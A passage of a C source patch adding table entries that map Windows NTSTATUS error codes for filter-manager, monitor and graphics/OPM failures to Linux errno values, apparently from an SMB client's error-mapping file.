++	{STATUS_FLT_DELETING_OBJECT, -EIO, "STATUS_FLT_DELETING_OBJECT"},
++	{STATUS_FLT_MUST_BE_NONPAGED_POOL, -EIO,
++	"STATUS_FLT_MUST_BE_NONPAGED_POOL"},
++	{STATUS_FLT_DUPLICATE_ENTRY, -EIO, "STATUS_FLT_DUPLICATE_ENTRY"},
++	{STATUS_FLT_CBDQ_DISABLED, -EIO, "STATUS_FLT_CBDQ_DISABLED"},
++	{STATUS_FLT_DO_NOT_ATTACH, -EIO, "STATUS_FLT_DO_NOT_ATTACH"},
++	{STATUS_FLT_DO_NOT_DETACH, -EIO, "STATUS_FLT_DO_NOT_DETACH"},
++	{STATUS_FLT_INSTANCE_ALTITUDE_COLLISION, -EIO,
++	"STATUS_FLT_INSTANCE_ALTITUDE_COLLISION"},
++	{STATUS_FLT_INSTANCE_NAME_COLLISION, -EIO,
++	"STATUS_FLT_INSTANCE_NAME_COLLISION"},
++	{STATUS_FLT_FILTER_NOT_FOUND, -EIO, "STATUS_FLT_FILTER_NOT_FOUND"},
++	{STATUS_FLT_VOLUME_NOT_FOUND, -EIO, "STATUS_FLT_VOLUME_NOT_FOUND"},
++	{STATUS_FLT_INSTANCE_NOT_FOUND, -EIO, "STATUS_FLT_INSTANCE_NOT_FOUND"},
++	{STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND, -EIO,
++	"STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND"},
++	{STATUS_FLT_INVALID_CONTEXT_REGISTRATION, -EIO,
++	"STATUS_FLT_INVALID_CONTEXT_REGISTRATION"},
++	{STATUS_FLT_NAME_CACHE_MISS, -EIO, "STATUS_FLT_NAME_CACHE_MISS"},
++	{STATUS_FLT_NO_DEVICE_OBJECT, -EIO, "STATUS_FLT_NO_DEVICE_OBJECT"},
++	{STATUS_FLT_VOLUME_ALREADY_MOUNTED, -EIO,
++	"STATUS_FLT_VOLUME_ALREADY_MOUNTED"},
++	{STATUS_FLT_ALREADY_ENLISTED, -EIO, "STATUS_FLT_ALREADY_ENLISTED"},
++	{STATUS_FLT_CONTEXT_ALREADY_LINKED, -EIO,
++	"STATUS_FLT_CONTEXT_ALREADY_LINKED"},
++	{STATUS_FLT_NO_WAITER_FOR_REPLY, -EIO,
++	"STATUS_FLT_NO_WAITER_FOR_REPLY"},
++	{STATUS_MONITOR_NO_DESCRIPTOR, -EIO, "STATUS_MONITOR_NO_DESCRIPTOR"},
++	{STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT, -EIO,
++	"STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT"},
++	{STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM, -EIO,
++	"STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM"},
++	{STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK"},
++	{STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED, -EIO,
++	"STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED"},
++	{STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK"},
++	{STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK"},
++	{STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA, -EIO,
++	"STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA"},
++	{STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK, -EIO,
++	"STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK"},
++	{STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER, -EIO,
++	"STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER"},
++	{STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER, -EIO,
++	"STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER"},
++	{STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER, -EIO,
++	"STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER"},
++	{STATUS_GRAPHICS_ADAPTER_WAS_RESET, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_WAS_RESET"},
++	{STATUS_GRAPHICS_INVALID_DRIVER_MODEL, -EIO,
++	"STATUS_GRAPHICS_INVALID_DRIVER_MODEL"},
++	{STATUS_GRAPHICS_PRESENT_MODE_CHANGED, -EIO,
++	"STATUS_GRAPHICS_PRESENT_MODE_CHANGED"},
++	{STATUS_GRAPHICS_PRESENT_OCCLUDED, -EIO,
++	"STATUS_GRAPHICS_PRESENT_OCCLUDED"},
++	{STATUS_GRAPHICS_PRESENT_DENIED, -EIO,
++	"STATUS_GRAPHICS_PRESENT_DENIED"},
++	{STATUS_GRAPHICS_CANNOTCOLORCONVERT, -EIO,
++	"STATUS_GRAPHICS_CANNOTCOLORCONVERT"},
++	{STATUS_GRAPHICS_NO_VIDEO_MEMORY, -EIO,
++	"STATUS_GRAPHICS_NO_VIDEO_MEMORY"},
++	{STATUS_GRAPHICS_CANT_LOCK_MEMORY, -EIO,
++	"STATUS_GRAPHICS_CANT_LOCK_MEMORY"},
++	{STATUS_GRAPHICS_ALLOCATION_BUSY, -EBUSY,
++	"STATUS_GRAPHICS_ALLOCATION_BUSY"},
++	{STATUS_GRAPHICS_TOO_MANY_REFERENCES, -EIO,
++	"STATUS_GRAPHICS_TOO_MANY_REFERENCES"},
++	{STATUS_GRAPHICS_TRY_AGAIN_LATER, -EIO,
++	"STATUS_GRAPHICS_TRY_AGAIN_LATER"},
++	{STATUS_GRAPHICS_TRY_AGAIN_NOW, -EIO, "STATUS_GRAPHICS_TRY_AGAIN_NOW"},
++	{STATUS_GRAPHICS_ALLOCATION_INVALID, -EIO,
++	"STATUS_GRAPHICS_ALLOCATION_INVALID"},
++	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE, -EIO,
++	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE"},
++	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED, -EIO,
++	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED"},
++	{STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION, -EIO,
++	"STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION"},
++	{STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE, -EIO,
++	"STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE"},
++	{STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION, -EIO,
++	"STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION"},
++	{STATUS_GRAPHICS_ALLOCATION_CLOSED, -EIO,
++	"STATUS_GRAPHICS_ALLOCATION_CLOSED"},
++	{STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE, -EIO,
++	"STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE"},
++	{STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE, -EIO,
++	"STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE"},
++	{STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE, -EIO,
++	"STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE"},
++	{STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST, -EIO,
++	"STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST"},
++	{STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE, -EIO,
++	"STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY"},
++	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_VIDPN, -EIO, "STATUS_GRAPHICS_INVALID_VIDPN"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET"},
++	{STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET"},
++	{STATUS_GRAPHICS_INVALID_FREQUENCY, -EIO,
++	"STATUS_GRAPHICS_INVALID_FREQUENCY"},
++	{STATUS_GRAPHICS_INVALID_ACTIVE_REGION, -EIO,
++	"STATUS_GRAPHICS_INVALID_ACTIVE_REGION"},
++	{STATUS_GRAPHICS_INVALID_TOTAL_REGION, -EIO,
++	"STATUS_GRAPHICS_INVALID_TOTAL_REGION"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE"},
++	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE"},
++	{STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET, -EIO,
++	"STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET"},
++	{STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET, -EIO,
++	"STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET"},
++	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET"},
++	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET"},
++	{STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_TARGET_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_TARGET_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH"},
++	{STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE"},
++	{STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET, -EIO,
++	"STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET"},
++	{STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_STALE_MODESET, -EIO, "STATUS_GRAPHICS_STALE_MODESET"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE"},
++	{STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN, -EIO,
++	"STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN"},
++	{STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION, -EIO,
++	"STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION"},
++	{STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES, -EIO,
++	"STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES"},
++	{STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE"},
++	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET"},
++	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET"},
++	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR"},
++	{STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET, -EIO,
++	"STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET"},
++	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET, -EIO,
++	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET"},
++	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE"},
++	{STATUS_GRAPHICS_RESOURCES_NOT_RELATED, -EIO,
++	"STATUS_GRAPHICS_RESOURCES_NOT_RELATED"},
++	{STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE, -EIO,
++	"STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE"},
++	{STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET, -EIO,
++	"STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET"},
++	{STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER, -EIO,
++	"STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER"},
++	{STATUS_GRAPHICS_NO_VIDPNMGR, -EIO, "STATUS_GRAPHICS_NO_VIDPNMGR"},
++	{STATUS_GRAPHICS_NO_ACTIVE_VIDPN, -EIO,
++	"STATUS_GRAPHICS_NO_ACTIVE_VIDPN"},
++	{STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY"},
++	{STATUS_GRAPHICS_MONITOR_NOT_CONNECTED, -EIO,
++	"STATUS_GRAPHICS_MONITOR_NOT_CONNECTED"},
++	{STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE"},
++	{STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE, -EIO,
++	"STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE"},
++	{STATUS_GRAPHICS_INVALID_STRIDE, -EIO,
++	"STATUS_GRAPHICS_INVALID_STRIDE"},
++	{STATUS_GRAPHICS_INVALID_PIXELFORMAT, -EIO,
++	"STATUS_GRAPHICS_INVALID_PIXELFORMAT"},
++	{STATUS_GRAPHICS_INVALID_COLORBASIS, -EIO,
++	"STATUS_GRAPHICS_INVALID_COLORBASIS"},
++	{STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE"},
++	{STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY, -EIO,
++	"STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY"},
++	{STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT, -EIO,
++	"STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT"},
++	{STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE, -EIO,
++	"STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE"},
++	{STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN, -EIO,
++	"STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN"},
++	{STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL, -EIO,
++	"STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL"},
++	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION, -EIO,
++	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION"},
++	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED,
++	-EIO,
++	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_GAMMA_RAMP, -EIO,
++	"STATUS_GRAPHICS_INVALID_GAMMA_RAMP"},
++	{STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_MODE_NOT_IN_MODESET, -EIO,
++	"STATUS_GRAPHICS_MODE_NOT_IN_MODESET"},
++	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON, -EIO,
++	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON"},
++	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE"},
++	{STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE"},
++	{STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS, -EIO,
++	"STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS"},
++	{STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING, -EIO,
++	"STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING"},
++	{STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED, -EIO,
++	"STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED"},
++	{STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS, -EIO,
++	"STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS"},
++	{STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT, -EIO,
++	"STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT"},
++	{STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM, -EIO,
++	"STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN"},
++	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT, -EIO,
++	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT"},
++	{STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED, -EIO,
++	"STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED"},
++	{STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION, -EIO,
++	"STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION"},
++	{STATUS_GRAPHICS_INVALID_CLIENT_TYPE, -EIO,
++	"STATUS_GRAPHICS_INVALID_CLIENT_TYPE"},
++	{STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET, -EIO,
++	"STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET"},
++	{STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED, -EIO,
++	"STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED"},
++	{STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER, -EIO,
++	"STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER"},
++	{STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED, -EIO,
++	"STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED"},
++	{STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED, -EIO,
++	"STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED"},
++	{STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY"},
++	{STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED, -EIO,
++	"STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED"},
++	{STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON, -EIO,
++	"STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON"},
++	{STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE, -EIO,
++	"STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE"},
++	{STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER, -EIO,
++	"STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER"},
++	{STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED, -EIO,
++	"STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED"},
++	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS,
++	-EIO,
++	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS"},
++	{STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST"},
++	{STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS, -EIO,
++	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS"},
++	{STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST"},
++	{STATUS_GRAPHICS_OPM_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_OPM_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_COPP_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_COPP_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_UAB_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_UAB_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS"},
++	{STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL, -EIO,
++	"STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL"},
++	{STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST, -EIO,
++	"STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST"},
++	{STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
++	"STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
++	{STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
++	"STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
++	{STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_OPM_INVALID_POINTER, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_POINTER"},
++	{STATUS_GRAPHICS_OPM_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_OPM_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_OPM_INVALID_HANDLE, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_HANDLE"},
++	{STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
++	"STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
++	{STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH, -EIO,
++	"STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH"},
++	{STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED, -EIO,
++	"STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED"},
++	{STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED, -EIO,
++	"STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED"},
++	{STATUS_GRAPHICS_PVP_HFS_FAILED, -EIO,
++	"STATUS_GRAPHICS_PVP_HFS_FAILED"},
++	{STATUS_GRAPHICS_OPM_INVALID_SRM, -EIO,
++	"STATUS_GRAPHICS_OPM_INVALID_SRM"},
++	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP, -EIO,
++	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP"},
++	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP, -EIO,
++	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP"},
++	{STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA, -EIO,
++	"STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA"},
++	{STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET, -EIO,
++	"STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET"},
++	{STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH, -EIO,
++	"STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH"},
++	{STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE, -EIO,
++	"STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE"},
++	{STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS, -EIO,
++	"STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS"},
++	{STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
++	"STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS"},
